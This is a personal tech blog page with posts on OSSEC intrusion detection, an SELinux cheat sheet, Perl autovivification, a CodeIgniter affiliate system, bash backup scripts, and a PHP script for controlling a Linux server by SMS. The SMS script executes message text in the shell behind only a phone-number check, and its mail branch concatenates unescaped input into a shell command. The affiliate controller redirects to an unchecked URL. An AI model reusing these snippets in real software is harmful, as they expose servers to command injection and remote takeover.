Welcome to the tuukkamerilainen.com tech blog!

This blog is dedicated to topics related to information and communications technology. GNU/Linux, security, web development and other IT-related news and ideas are especially in the spotlight. Above all, I am going to publish things that get my attention!


What is OSSEC, Host Based Intrusion Detection (HIDS) In Practice

December 21, 2022

Introduction To OSSEC Host Based Intrusion Detection (HIDS)

Prevention of a security incident is ideal, but detection is a must. Detecting a security incident is easier said than done. Host Based Intrusion Detection is a great concept for pointing out unusual activity and can help you concentrate on the most likely issues. To answer what OSSEC Host Based Intrusion Detection is in practice, you must first understand the concept of intrusion detection.

Intrusion detection in general aims to automatically recognise and alert about unusual or harmful activity or states of a system or network. With a host based intrusion detection system like OSSEC, the detection system is installed on a specific host: detection happens on the host, not in the network (e.g. OSSEC is installed and runs on a Linux server).

In practice this means that OSSEC is running on, for example, a Linux server. OSSEC actively watches activities in the file system, logs and so on, and the goal is to determine which activities are normal and relevant for the system and which are unusual or potentially harmful. If something unusual or harmful occurs, OSSEC alerts about the event with a criticality level from 1 to 10 (a higher value means higher risk). OSSEC also contains features for active intrusion prevention, meaning that OSSEC is able to stop potentially harmful actions or attacks, for example by automatically adding firewall rules to drop a potentially malicious actor’s connection from a certain IP address.
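As an illustration of the active response idea, an ossec.conf fragment along these lines ties the stock firewall-drop script (defined in the default configuration) to high-level alerts. The level and timeout here are arbitrary example values; check your own ossec.conf and the OSSEC documentation for the exact command definitions:

```xml
<ossec_config>
  <!-- Example only: bind the bundled firewall-drop command to high-level alerts -->
  <active-response>
    <command>firewall-drop</command>
    <location>local</location>
    <level>7</level>       <!-- trigger on alerts of level 7 or higher -->
    <timeout>600</timeout> <!-- remove the firewall rule after 600 seconds -->
  </active-response>
</ossec_config>
```

With a block like this in place, a burst of failed logins that raises a level 7+ alert would get the offending source IP dropped at the firewall for the timeout period.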

The first time I heard about “host based intrusion detection (HIDS)” I was quite confused. HIDS didn’t ring any bells; from the name I couldn’t figure out what it is or what the benefits could be. Many years later the concept of HIDS feels like the bread and butter of a successfully hardened system. In a nutshell, HIDS is a great way to secure a server, adding one important protective layer and moving towards defence in depth! In this post I will explain how HIDS works, how to use it and, in my opinion, what the benefits are.

Why HIDS And OSSEC Matters, The Defence In Depth Principle

Let’s say you have a valuable asset, for example a Linux server which is used to deliver and store sensitive, business-critical information. The server is connected to the Internet because of high and flexible use-case-related availability requirements. It is quite obvious that the server must be secure from an information security perspective (confidentiality, integrity and availability of data). There is no single magic trick or silver bullet that will make sure the server is protected. Instead, multiple threat aspects must be noted and many different security controls must be in place. At this point the principle of defence in depth appears in the spotlight. Defence in depth in practice means adding multiple protective layers and measures to secure valuable assets.

To ensure defence in depth on a Linux server, effective prevention of external attacks is ideal. Detection of an attack, on the other hand, is a must, and let’s not forget the capability to respond to an incident. In a Linux server context, when we think about prevention techniques, the following are the basics to start from:

  • Security updates (always, not just today)
  • Limited user accounts and privileges in general (least privilege with the system’s own capabilities)
  • Mandatory Access Control (SELinux, AppArmor, etc. to enhance access control after previous)
  • Just necessary mandatory software installed/running (remove or deactivate everything that you don’t need)
  • Hardened administration channels (ssh hardening etc.)
  • Strict firewall rules
  • Web application firewall (in case of web server)
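For instance, the ssh hardening item from the list above typically boils down to a few sshd_config directives. This is a minimal, hedged sketch (the AllowUsers name is a placeholder; adapt it to your own accounts and test a new connection before closing your current session):

```
# /etc/ssh/sshd_config (excerpt) - example hardening directives
PermitRootLogin no          # no direct root logins
PasswordAuthentication no   # keys only, no passwords
PubkeyAuthentication yes
AllowUsers exampleadmin     # placeholder username; list your real admin accounts
```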

In my opinion, the previous measures are mandatory for any system that is connected to the Internet. But what happens when an attacker is able to break through one of these protection layers, or even all of them? And it really is about when it happens, not if. In that case we need detection capabilities and active reaction. This is the stage for host based intrusion detection like OSSEC. Detection and alerting includes the following aspects:

  • Active monitoring of different logs and matching to known attack patterns or risky actions (syslog, apache logs, auth log, etc.)
  • File system monitoring based on file integrity (did some files suddenly change under /etc or /var/www)
  • Is there malware or a rootkit somewhere in the system
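The log-monitoring aspect above can be sketched with a toy example (this is not OSSEC itself, just the kind of pattern an OSSEC log rule matches): scan an auth-log excerpt for repeated failed SSH logins per source IP. The log lines, file paths and the threshold of 3 are made-up sample values.

```shell
#!/bin/sh
# Write a made-up auth-log excerpt to a temporary file.
cat > /tmp/auth_sample.log <<'EOF'
Dec 21 10:00:01 web sshd[101]: Failed password for root from 203.0.113.7 port 4711 ssh2
Dec 21 10:00:03 web sshd[102]: Failed password for root from 203.0.113.7 port 4712 ssh2
Dec 21 10:00:05 web sshd[103]: Failed password for admin from 203.0.113.7 port 4713 ssh2
Dec 21 10:01:00 web sshd[104]: Accepted publickey for tuukka from 198.51.100.2 port 2222 ssh2
EOF

# Count "Failed password" lines per source IP; alert when a threshold is hit.
awk '/Failed password/ { fails[$(NF-3)]++ }
     END { for (ip in fails) if (fails[ip] >= 3)
             print "ALERT:", fails[ip], "failed logins from", ip }' \
    /tmp/auth_sample.log | tee /tmp/auth_alerts.txt
```

OSSEC does the same kind of matching continuously and in real time, with a large set of prebuilt decoders and rules instead of a single hard-coded pattern.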

What Is OSSEC Host Based Intrusion Detection

The idea is to monitor certain hosts and actively alert in real time about unusual or harmful security-related events. Monitoring with OSSEC can be performed locally or with a server/agent combination.

Let’s say you have a Linux-based production web server called “main web”. The main web server can work as an OSSEC agent and another, separate server can work as the OSSEC server. In this case “main web” will send all its alerts to the OSSEC server and perform monitoring based on the rules configured on the server.
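For a rough idea of what the agent side looks like, the agent’s /var/ossec/etc/ossec.conf points at the OSSEC server (203.0.113.10 below is a placeholder address); the shared authentication key is then exchanged with the manage_agents tool on both ends:

```xml
<ossec_config>
  <client>
    <!-- placeholder address of the OSSEC server -->
    <server-ip>203.0.113.10</server-ip>
  </client>
</ossec_config>
```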

At a high level, OSSEC contains the following features:

  • Log based Intrusion Detection (LIDs)
  • Rootkit and Malware Detection
  • Active Response
  • Compliance Auditing
  • File Integrity Monitoring (FIM)
  • System Inventory

What Is OSSEC Used For

OSSEC has many use cases. It can be used to monitor multiple different servers with different operating systems (Linux, Windows, FreeBSD, etc.) in real time from a separate monitoring server. In a minimalistic approach, OSSEC simply runs locally and monitors the system, and alerts can be viewed locally or received via email (there is actually even a Slack integration).

How I Use OSSEC

In my case I have typically monitored critical Internet-facing assets (mostly Linux servers). OSSEC runs on the critical assets in agent mode, and I monitor those assets with OSSEC running in server mode on another host. Between these two servers there is a UDP connection that is encrypted by OSSEC. At the end of the pipeline I use Splunk to visualise all the data, so I can monitor the critical Internet-facing asset easily with a browser.

OSSEC HIDS with Splunk setup

How to Install And Configure OSSEC

To install OSSEC on Ubuntu 20.04 I followed this guide on Digital Ocean; the guide contains a few basic configuration examples as well. In my case everything worked smoothly during the installation, even though the guide was made for Ubuntu 14.04. OSSEC comes with a handy installation script which guides you through, and the OSSEC documentation is also quite handy.

There are multiple deployment/installation possibilities. As said, I chose the agent & server method, in which the agent runs on a critical asset and all the OSSEC alerts are sent to the OSSEC server running in another environment.

My pro tips for installing:

How To Configure Splunk to Visualize The OSSEC Alerts

Once you have an OSSEC agent and server running on Linux and the communication is working, you can access OSSEC alerts under /var/ossec/logs/alerts, or configure OSSEC to send alerts via email. I like the possibility of accessing the data with a browser, and I think Splunk works quite smoothly for that.

One thing to notice is that, as far as I know, OSSEC doesn’t support rsyslog or any other method to smoothly send alert data to remote hosts that are not running an OSSEC server. For that reason I have decided to run Splunk and the OSSEC server on the same host.

If you don’t know how to install Splunk, you will have to read the documentation and do some googling. Or you can choose the lazy way like I did. I am a big fan of the Linode hosting environment, and its management console offers a marketplace with a few-click installation GUI which deploys a ready-to-use Splunk.

When you have Splunk running you can just install the OSSEC server on the same host. After that there is a quite easy-to-follow guide on how to configure OSSEC to send alerts to Splunk and Splunk to show the data. Unfortunately the guide doesn’t contain all the details; it actually references the OSSEC documentation. If you have problems seeing the data in Splunk, check this section of the OSSEC documentation carefully (you need to enable client-syslog etc.).
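As a sketch of that client-syslog step: the OSSEC server’s ossec.conf gets a syslog_output block pointing at the host where Splunk listens (here the same machine, on an assumed UDP port 514; adjust to whatever input port you configured in Splunk), and the forwarder is then enabled with /var/ossec/bin/ossec-control enable client-syslog followed by a restart:

```xml
<ossec_config>
  <syslog_output>
    <server>127.0.0.1</server> <!-- Splunk runs on the same host in this setup -->
    <port>514</port>           <!-- assumed UDP input port configured in Splunk -->
  </syslog_output>
</ossec_config>
```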

Conclusion of OSSEC Host Based Intrusion Detection

  • Prevention of a security incident is ideal, but detection is a must, and OSSEC will help with that
  • Host Based Intrusion Detection is one of the key elements when aiming for “defence in depth” on an Internet-facing critical server
  • OSSEC is a handy and feature-rich Host Based Intrusion Detection system with active response capabilities
  • Alerts from OSSEC can be sent to you via email or Slack, or you can visualise them, for example, with Splunk
  • I am sure you will have serious fun with OSSEC and its configuration capabilities if you haven’t tried it before and you like to explore Linux server related stuff

Mighty SELinux cheat sheet

October 14, 2016

Cheat sheet for SELinux (Security-Enhanced Linux). More information about the project at https://selinuxproject.org/. All commands tested on CentOS release 6.8 (Final).

Logs

Everything:

$ less /var/log/audit/audit.log

Human readable:

$ less /var/log/messages

Commands:

Status

$ sestatus

Permissive/Enforcing

$ setenforce 0/1

More information about an alert with sealert (the alert IDs are in /var/log/messages)

$ sealert -l IDHERE

Show all booleans

$ getsebool -a

List all modules which are in permissive mode

$ semodule -l | grep "permissive"

Check file/directory context

$ ls -Z

Check process context

$ ps aux -Z

Check network related information

$ netstat -Z
$ netstat -atZ

List audits to allow (based on SELinux alerts)

$ audit2allow -a

Create policy based on audits to allow list

$ audit2allow -a -M fancypolicynameofyourchoice

Activate the policy

$ semodule -i fancypolicynameofyourchoice.pp

Set a domain to permissive mode / back to enforcing (httpd in this example)

$ semanage permissive -a httpd_t
$ semanage permissive -d httpd_t

Copy context to file/directory from existing file/directory

$ chcon -R --reference /source /destination

Creating your own policy (te -> pp)

$ checkmodule -M -m -o fancypolicynameofyourchoice.mod fancypolicynameofyourchoice.te
$ semodule_package -o fancypolicynameofyourchoice.pp -m fancypolicynameofyourchoice.mod

Activate your own policy

$ semodule -i fancypolicynameofyourchoice.pp

Example of a basic custom module

This module will allow httpd to open files in the tmp context (/tmp)

module fancy_example_policy 1.0;

require {
    type httpd_t;
    type tmp_t;
    class file { open };
}

allow httpd_t tmp_t:file open;

Remove activated policy

$ semodule -r fancy_example_policy

Learn

http://www.linuxtopia.org/online_books/getting_started_with_SELinux/SELinux_overview.html
http://danwalsh.livejournal.com/

Crazy things can happen in dynamically typed languages (such as Perl)

October 13, 2016

Alright, some people really love programming languages which are dynamically typed. Some say that static typing is the only way. I do not know which camp I belong to, or whether I even want to belong to any. However, I found a crazy thing which happened with a dynamically typed language.

What does it actually mean when a language is dynamically typed or statically typed? I am not the top expert to answer this question, but in a nutshell it is something like this…

In a dynamically typed language you can declare a variable like this:

$number = 1;
$word = "something";

In a statically typed language you have to declare a variable like this:

int $number = 1;
String $word = "something";

Here comes the crazy thing I promised

If you have ever developed with Perl you know that in Perl you can do many things the way you want. Perl is a dynamically typed language. I was adding some functionality into an already existing piece of code. There were already many checks, and if something failed, an error message was appended to the $errors variable.

I added this block to that existing code:

if ( $errors->{what_ever} ){
    # Do something
}

That block broke everything, and it did it in a way I could never expect. Plus there were absolutely no errors (even though strict and warnings were enabled). Here are two proofs of concept:

1. This is similar to my situation where everything failed.

#!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;

my $errors;

print Dumper($errors); # $VAR1 = undef;

if( $errors ){
    # This is not true
    print "This is not true\n";
}

if ( $errors->{what_ever} ){
    # Do something
}

print Dumper($errors); # $VAR1 = {};

if( $errors ){
    # This is true
    print "This is true\n";
}

2. This is the valid version, which works.

#!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;

my $errors = {};

print Dumper($errors); # $VAR1 = {};

if( $errors ){
    # This is true
    print "This is true\n";
}

if ( $errors->{what_ever} ){
    # Do something
}

print Dumper($errors); # $VAR1 = {};

if( keys %{$errors} ){
    # This is not true
    print "This is not true\n";
}

So what really happened in that first piece of code?

First I declared a variable:

my $errors;

It tells Perl: “hey, I want to use a scalar called errors, please let me”.

Then a little bit later comes the block:

if ( $errors->{what_ever} ){
    # Do something
}

There I asked: “dear Perl, do you remember that scalar called errors? Please test if that scalar has a hash key called what_ever”. Then Perl thinks: “Sure I remember it and sure I can test it. Oh wait, scalars do not have keys. Only hashes have keys. Well, I will make this errors variable a hash reference.” Here is the big deal: Perl defines $errors to be a hash reference. This behaviour is called autovivification, and I could never expect it to happen inside an if statement.

Then the code runs forward and we come to:

if( $errors ){
    # This is true
    print "This is true\n";
}

Here I am asking: “Please Perl, one more question: can you tell me if $errors is true?”. Perl answers: “Of course it is true, it is a hash reference”. What I expected here is that Perl would say “It is false because there is nothing in there”.

So what do you think, is this crazy or not?

Affiliate system on Codeigniter

June 10, 2015

Introduction

I have a friend (yes, you read that right) who is using CodeIgniter in his e-commerce shop. He had been looking for a solution to pay commissions to advertisers. I recommended an affiliate system to him and it turned out that he had never even heard about it before. I introduced the concept to him and we started to research how it actually works behind the scenes. For me it meant googling how to actually code it. It felt like chaos and I did not get any further for a long time. The whole affiliate world in Google is flooded with affiliate sites which advertise everything except how to design an affiliate system.

Finally I found this Stack Overflow thread: http://stackoverflow.com/questions/16231995/how-to-design-an-affiliate-system-on-codeigniter-to-use-on-every-page-on-the-si . That was the exact answer to all my questions, and after all that mess it was very easy to actually build the very basics of the system. I am going to show how I did it based on that Stack Overflow thread.

How does it work

When an advertiser recommends something, he/she will use a URL which contains a referrer id. If a basic URL of the site is something like http://example.com/products/23423, with this affiliate system the advertiser would use something like this instead: http://example.com/ref?id=tuukkamerilainen&url=products/23423 . Now the customer who clicks the link will be redirected to the site, first of all requesting the class Ref (ref.php). In ref.php we will make a new cookie which contains information about the advertiser. If the customer then makes an order, when the “make an order” button is clicked we will check if the customer has the cookie containing information about the advertiser. If yes, we will save information about the order and the advertiser to the database in the same row.

Required changes for the system

  • ref.php to controllers
  • Cookie check and database insert to orders.php or whatever it is in your system (the controller which handles the request when a customer makes an order)
  • Table in database for affiliate information

ref.php

[php]

<?php

class Ref extends CI_Controller {

    /**
     * Index Page for this controller.
     * @author      Tuukka Merilainen
     * @copyright   10.6.2015
     * @see http://codeigniter.com/user_guide/general/urls.html
     */
    public function index()
    {
        $url = $this->input->get('url');
        $ref = $this->input->get('id');
        $cookie = array(
            'name'   => 'refcookie',
            'value'  => $ref,
            'expire' => '86500',
        );

        $this->input->set_cookie($cookie);
        $this->load->helper('url');
        redirect($url);
    }
}

[/php]

orders.php

[php]

$this->load->helper('cookie');
if (get_cookie('refcookie')) {
    $refCookie = $this->input->cookie('refcookie', TRUE);
    $order_id = $d['order_id'];
    $affidata = array(
        'OrderId' => $order_id,
        'RefId' => $refCookie
    );
    $this->db->insert('affiliate', $affidata);
}

[/php]

Database

In this example there is already an orders table which has an attribute OrderId. We will use it as a foreign key.

[sql]

CREATE TABLE IF NOT EXISTS `affiliate` (
`afid` int(11) NOT NULL,
`OrderId` smallint(5) unsigned NOT NULL,
`RefId` varchar(255) NOT NULL
) ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;

ALTER TABLE `affiliate`
ADD PRIMARY KEY (`afid`), ADD KEY `OrderId` (`OrderId`);

ALTER TABLE `affiliate`
MODIFY `afid` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=1;

ALTER TABLE `affiliate`
ADD CONSTRAINT `afiliate_ord` FOREIGN KEY (`OrderId`) REFERENCES `orders` (`OrderId`) ON UPDATE CASCADE;

[/sql]

How to use it

Now when a customer comes from the advertiser’s site and makes an order on your site, the affiliate table will be updated. From that table it is possible to count commissions for the advertiser or do whatever you like. It might be a good idea to make another view which contains some more information (maybe the total amount of the order, etc.).

Conclusion

As you might have already noticed, this is just a basic template for an affiliate system. It may work in a small e-commerce shop just like this. For long-term use and with lots of traffic there is a lot to do and many happy moments in development. I hope this guide gives you some ideas about where to start and how it could be done.

 

Simple backup system for Linux with Bash, Tar, Rsync and Crontab pt.1/2

June 9, 2015

Introduction

I have spent many hours backing up my servers’ files. I used to have one text file which contained predefined tar and rsync commands, and I was copy-pasting them. Sometimes I did this once a week and sometimes once a month. This wishy-washy routine was totally OK, but it was a waste of time. After all this mess I realised I had to do something about it. I decided to automate it with simple Bash scripts and crontab.

Tested on Ubuntu 14.04 LTS.

This first part contains information on how to make backups. The second part will show how to recover the backups.

This is how it works in a nutshell

First of all, I have two Linux servers: a production node and a node for storing my backups. I have also set up public key authentication between them (nice guide for public key authentication). For example, if I am logged in on my production node I am able to log in to the backup node like this (without being asked for a password):

[raw]$ ssh backup-node[/raw]

The backup process is handled by these two files:

[raw]backup-tar.sh backup-rsync.sh[/raw]

backup-tar.sh is the script which makes a MySQL dump (a backup of the database) and compresses my full system (/) into a single tar.gz file. This script is executed by the root user’s crontab.

backup-rsync.sh is executed by a normal user’s crontab. It contains the settings for sending the backup files to the backup node via rsync.

PLEASE NOTICE! There are two separate files for a reason. The tar process has to be done with root privileges (sudo) since it compresses files owned by root as well. But rsync without password authentication is not possible with sudo: if you try to do $ sudo rsync … it will always ask for a password.

backup-tar.sh

[raw]#!/bin/bash
#Purpose = Backup of Important Data
#Created on 05-05-2015
#Author = Tuukka Merilainen
#Version 1.0

#START
# Tar credentials
DATE=`date +%d-%b-%Y`                  # This command will add the date to the backup file name.
FILENAME=fullbackup-$DATE.tar.gz       # Here I define the backup file name format.
SRCDIR=/                               # Location of the important data directory (source of the backup).
DESDIR=/example/please/change          # Destination of the backup file.

# Database credentials
user="root"                            # username for the database, e.g. root
password="example-password"            # password for the database
db_name="fulldbbackup"                 # name for the db backup file
backup_path="/example/please/change"   # path where the backup is stored

# Dump database into SQL file
mysqldump --user=$user --events --ignore-table=mysql.event --password=$password --all-databases > $backup_path/$db_name-$DATE.sql

# Make tarball of /
tar -cpzf $DESDIR/$FILENAME --directory=/ --exclude=proc --exclude=sys --exclude=dev/pts --exclude=$DESDIR $SRCDIR
#END[/raw]

backup-rsync.sh

[raw]#!/bin/bash
#Purpose = Sync backup files to an another server
#Created on 05-05-2015
#Author = Tuukka Merilainen
#Version 1.0
#START

rsync -a --bwlimit=5000 -e ssh --hard-links --inplace sourcefolder destinationuser@example.com:/full-backup

#END[/raw]

How to make it work

Download and extract the scripts

[raw]$ wget http://tuukkamerilainen.com/files/backup.tar.gz[/raw]
[raw]$ tar -xf backup.tar.gz[/raw]

Edit the scripts to match your environment

Take care of the file paths and the address of the backup server. At least modify everything marked with something like “example”.

Make two different crontabs

First, for backup-tar.sh
[raw]$ sudo crontab -e[/raw]

Add line:
[raw]00 08 * * 7 /bin/bash /path/to/backup-tar.sh[/raw]
This will run the backup-tar.sh script every Sunday at 08:00.

Then for backup-rsync.sh
[raw]$ crontab -e[/raw]

Add line:
[raw]00 23 * * 7 /bin/bash /home/tuukka/backup-rsync.sh[/raw]
This will run the backup-rsync.sh script every Sunday at 23:00.

Sources

http://www.broexperts.com/2012/06/how-to-backup-files-and-directories-in-linux-using-tar-cron-jobs/

https://ukk.kapsi.fi/questions/164/synologyn-rsyncilla-siiloon

 

 

Control Linux server via sms (reboot, get uptime, send mail, etc.) Part 1

May 17, 2015

Introduction

As I mentioned in a previous post, I enrolled in the Linux as a server course immediately when I started at Haaga-Helia. It was an excellent choice and now I am continuing my Linux studies with the Linux project course. In this course everybody is free to choose their own project. It has to be something which solves some kind of problem, but basically you can do whatever kind of project you like. This is my project for Tero Tuoriniemi’s Linux project course.

What would you do if something bad happened to your server while you were in the middle of nowhere without a connection to the Internet? How cool would it be if you could manage that situation just by sending an SMS to your server to reboot it, or get some information and try to solve the problem otherwise? I would say it would be at least pretty cool!

I am going to show how to actually do it with these tools:

  • Debian
  • Apache + PHP
  • Twilio.com account + number
  • iPhone
  • Mail server for sending email
  • API key from ilmatieteenlaitos (the Finnish Meteorological Institute) for weather data

Table of contents:

  • Introduction
  • Starting point
  • Examples
  • Php script for controlling Linux via sms (this goes to your server)
  • How the script works
  • Script done, then what?
  • Setting up the twilio.com for sms-control
  • What next?
  • Conclusion

Control Linux via SMS with Twilio.com diagram

Starting point

I have Debian running on Linode’s virtual private server. Apache and PHP are configured and tested (I like to use this Digital Ocean tutorial for it).

You will also need an account at Twilio.com. It is a service which provides “SMS tools”. Basically you can buy a number and send SMS messages to it. Then Twilio passes the message sent to the number onwards to somewhere. In this case “somewhere” is our Debian server.

Examples

Using my service is super easy. For security reasons I made it work only with messages sent from my personal number, so it is not available for public use. If you like, you can build it for yourself with this guide.

When I want to reboot my system I do the following:

SMS-message:

boot

Send to number:

+12345678 (this is not the real number, but similar)

After the message is sent, the server reboot process starts in less than 2 seconds and I get this SMS message as a response:

The system is going down for reboot NOW! :)

How to boot linux via sms and Twilio view from iPhone
How to boot linux via sms and Twilio view from linux console

Sometimes I want to get the uptime of my server, so I do this:

SMS-message:

exec uptime

Send to number:

+12345678 (this is not the real number, but similar)

In a few seconds I get something like this as a response:

19:30:44 up 1 day, 6:08, 0 users, load average: 0.01, 0.02, 0.05

A few days ago I was so lazy that I did not want to get out of bed just to check the temperature on a thermometer, so I asked my server:

SMS-message:

ilma helsinki

Send to number:

+12345678 (this is not the real number, but similar)

In a few seconds I get something like this as a response:

Bunny friendly temperature: 1.46 helsinki

Next I will show you how to make this all happen! 🙂

Php script for controlling Linux via sms (this goes to your server)

When you send an SMS message to the Twilio number, Twilio receives it as plain text and then forwards it to a URL specified in your Twilio account settings. In my case I have this URL in the settings: http://myserverip/control-sms.php. This script is the thing which actually makes the magic (e.g. a reboot) happen. It checks the message forwarded from Twilio and acts depending on the content of the message. Finally it compiles XML data which Twilio reads, sending the content back to the original message sender. For example, if your message requests a reboot, the server will respond “The system is going down for reboot NOW! :)” and you get that kind of message via SMS.

Full script:

[php]<?php

//the first 4 characters of the message declare the action (mail, ilma, exec or boot)
$action = substr($_REQUEST['Body'],0,4);
//the rest of the message is the actual content
$message = substr($_REQUEST['Body'],5,150);
//get the sender's number
$number = $_REQUEST['From'];
$allowedNumber = '+358400630148';

//Check the sender's number
if($number != $allowedNumber){
exit();
}

if(strpos($message, "@") !== false && $action == "mail"){
//To reach this point the message has to be like: mail someone@example.com message-you-would-like-to-send
$spacePos = strpos($message, " ");
$mailTo = substr($message,0,$spacePos);
$message = substr($message,$spacePos,100);
shell_exec('echo '.$message.' | mail -s SMS-mail -a "From: put-your-own-email-here@example.com" '.$mailTo);
$result = "mail sent";
}else if($action == "ilma"){
//To reach this point the message has to be like: ilma helsinki (only works with Finnish cities/places)
date_default_timezone_set('Europe/Helsinki');
$pvm = date('Y-m-d');
$time = date('H:00:00');
$location = substr($_REQUEST['Body'],5,40);
$dom = new DomDocument();
//Takes data from ilmatieteenlaitos open data
//For this to work please add your API key. You can get it for free from https://ilmatieteenlaitos.fi/rekisteroityminen-avoimen-datan-kayttajaksi
$dom->loadXML(file_get_contents("http://data.fmi.fi/fmi-apikey/set-your-own-api-key-here/wfs?request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::timevaluepair&place=".$location."&parameters=temperature&starttime=".$pvm."T".$time."Z&endtime=".$pvm."T".$time."Z"));
$tempSource = $dom->getElementsByTagNameNS("http://www.opengis.net/wfs/2.0", "member");
foreach ($tempSource as $m) {
$point = $m->getElementsByTagNameNS("http://www.opengis.net/waterml/2.0", "point");
foreach ($point as $p) {
$tempTime =  $p->getElementsByTagName("time")->item(0)->nodeValue;
$temperature = $p->getElementsByTagName("value")->item(0)->nodeValue;
}
$result = "Bunny friendly temperature: ".$temperature." ".$location;
}
}else if($action == "exec"){
//To reach this point the message has to be like: exec ls
$result = shell_exec($message);
}else if($action == "boot"){
//To reach this point the message has to be like: boot
shell_exec('sudo /home/tuukka/reboot.sh');
$result = "The system is going down for reboot NOW! :)";
}else{
$result = "command not found";
}

//Compiles XML data for Twilio. This is what Twilio is looking for.
header("content-type: text/xml");
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
?>
<Response>
<Message><?php echo $result ?></Message>
</Response>
[/php]

How the script works

(If you do not care about how it works, or you are just too curious and want to test it immediately, you can skip this part, but please note that to use the weather feature you need an API key from ilmatieteenlaitos.)

In this script there are four different types of tasks which can be done: send mail, get the weather temperature of a specific location, execute a command in the shell or reboot the system. If none of these happens, the script will return the string “command not found”. I am going to explain how these different tasks work. But…

First of all the script gathers basic information:

[php]//the first 4 characters of the message declare the action (mail, ilma or exec)
$action = substr($_REQUEST['Body'],0,4);
//the rest of the message is the actual content
$message = substr($_REQUEST['Body'],5,150);
//get the sender's number
$number = $_REQUEST['From'];
$allowedNumber = '+358400630148';
//Check the sender's number
if($number != $allowedNumber){
exit();
}[/php]

It takes the first four characters of the message and sets them to the $action variable, which will be used to route actions (which task to do). Then it puts the rest of the message into the $message variable. This is the actual “command” which will be executed. After that it takes the number the message was sent from and sets it to the $number variable. Finally it checks that $allowedNumber and $number are the same. If not, the script is terminated and nothing happens. This last step is there to make sure that no one else can, for example, reboot your system. So the only way to control the server is to send a message from the number which is specified as $allowedNumber.

At this point we have two important variables: $action and $message.

$action defines what the user wants to be done (which one of those four tasks)
$message defines what kind of information the user gave (content of the email, location info for the weather or the command to be executed)

1. Task: sending mail

[php]if(strpos($message, "@") !== false && $action == "mail"){
//To reach this point the message has to be like: mail someone@example.com message-you-would-like-to-send
$spacePos = strpos($message, " ");
$mailTo = substr($message,0,$spacePos);
$message = substr($message,$spacePos,100);
shell_exec('echo '.$message.' | mail -s SMS-mail -a "From: put-your-own-email-here@example.com" '.$mailTo);
$result = "mail sent";
}[/php]
If $message contains an @ character and $action equals “mail”, this task will be executed.

Then the script looks for the first space and sets the string before it to the $mailTo variable, using it as the email address to send the mail to. The rest of $message is the actual content of the mail. Finally the script sets the string “mail sent” to the $result variable. This is the string which is going to be the response to the original SMS message.

2. Task: check weather

[php]else if($action == "ilma"){
//To reach this point the message has to be like: ilma helsinki (only works with Finnish cities/places)
date_default_timezone_set('Europe/Helsinki');
$pvm = date('Y-m-d');
$time = date('H:00:00');
$location = substr($_REQUEST['Body'],5,40);
$dom = new DomDocument();
//Takes data from ilmatieteenlaitos open data
//For this to work please add your API key. You can get it for free from https://ilmatieteenlaitos.fi/rekisteroityminen-avoimen-datan-kayttajaksi
$dom->loadXML(file_get_contents("http://data.fmi.fi/fmi-apikey/set-your-own-api-key-here/wfs?request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::timevaluepair&place=".$location."&parameters=temperature&starttime=".$pvm."T".$time."Z&endtime=".$pvm."T".$time."Z"));
$tempSource = $dom->getElementsByTagNameNS("http://www.opengis.net/wfs/2.0", "member");
foreach ($tempSource as $m) {
$point = $m->getElementsByTagNameNS("http://www.opengis.net/waterml/2.0", "point");
foreach ($point as $p) {
$tempTime =  $p->getElementsByTagName("time")->item(0)->nodeValue;
$temperature = $p->getElementsByTagName("value")->item(0)->nodeValue;
}
$result = "Bunny friendly temperature: ".$temperature." ".$location;
}
}[/php]
If $action is the string ilma, this task will be executed. First it sets the timezone, gets the current date and time, and extracts $location from the SMS message. Then it loads XML data from Ilmatieteenlaitos (the Finnish Meteorological Institute), which provides all measurements as open data. To get the temperature it uses the current date and time stored in the $pvm and $time variables. Finally it sets the temperature and location to the $result variable, which is sent back to the SMS sender.
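To make the URL construction concrete, here is a rough shell equivalent of how the PHP concatenates the query string (the API key and place are placeholders; this only builds the URL, it does not perform the request):

```shell
# Build the FMI open-data query URL the same way the PHP concatenates it.
pvm=$(date +%Y-%m-%d)        # current date, e.g. 2015-03-01
hour=$(date +%H:00:00)       # current hour, minutes and seconds zeroed
location="helsinki"
url="http://data.fmi.fi/fmi-apikey/set-your-own-api-key-here/wfs?request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::timevaluepair&place=${location}&parameters=temperature&starttime=${pvm}T${hour}Z&endtime=${pvm}T${hour}Z"
echo "$url"
```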

3. Task: execute command in shell

[php]else if($action == "exec"){
//To reach this point message have to be like: exec ls
$result = shell_exec($message);
}[/php]
If $action is the string exec, this task will be executed. As you can see this is very simple: $message is executed in the shell and the response (for the ls command, for example, a list of files in the directory) is set to the $result variable and sent to the original SMS sender.

4. Task: reboot system

[php]else if($action == "boot"){
shell_exec('sudo /home/tuukka/reboot.sh');
$result = "The system is going down for reboot NOW! :)";
}[/php]
If $action is the string boot, this task will be executed. This one is a little bit tricky. On Debian and Ubuntu the system is easy to reboot with the command reboot, but it requires sudo. PHP's built-in shell_exec function does not have sudo privileges by default. I have solved the problem by making a bash script, reboot.sh, and in the sudoers file I have specified that www-data has privileges to sudo that file.

reboot.sh (in my system it is in path /home/tuukka/reboot.sh):
[raw]#!/bin/sh
reboot[/raw]
In /etc/sudoers I have added this line:
[ini]www-data ALL=NOPASSWD: /home/tuukka/reboot.sh[/ini]

 

Script done, then what?

Simply put this script under your public_html or whatever folder is accessible via the Internet. In my case the script is at /var/www/sms-control.php.

Now I make a promise. The following step will be the last!

Setting up the twilio.com for sms-control

Head to twilio.com and create a new account. After that you will need to enter your credit card details and load some money to your account. Then click the Numbers link and Buy a number.

Twilio.com buying number part1

Next set the search method to sms and click search.

Twilio.com buying number part2

Then choose any number from the list and click Buy

Twilio.com buying number part3

Then you have to confirm your purchase

Twilio.com buying number part4

After that head back to Numbers and click on the number you just purchased

Twilio.com buying number part5

Then scroll down and set the URL which points to your sms-control.php script.

Twilio.com buying number part6

Good news: all done and everything should work! Try sending an SMS to the number you just purchased.

What next?

Well, I have actually done something already. Wouldn't it be super cool to get information about your home via SMS? I think it would, and I have started by measuring temperature. I made my Raspberry Pi measure the temperature and store it in a database, and upgraded sms-control.php to check the current temperature from the database. I am going to explain this task in part 2.

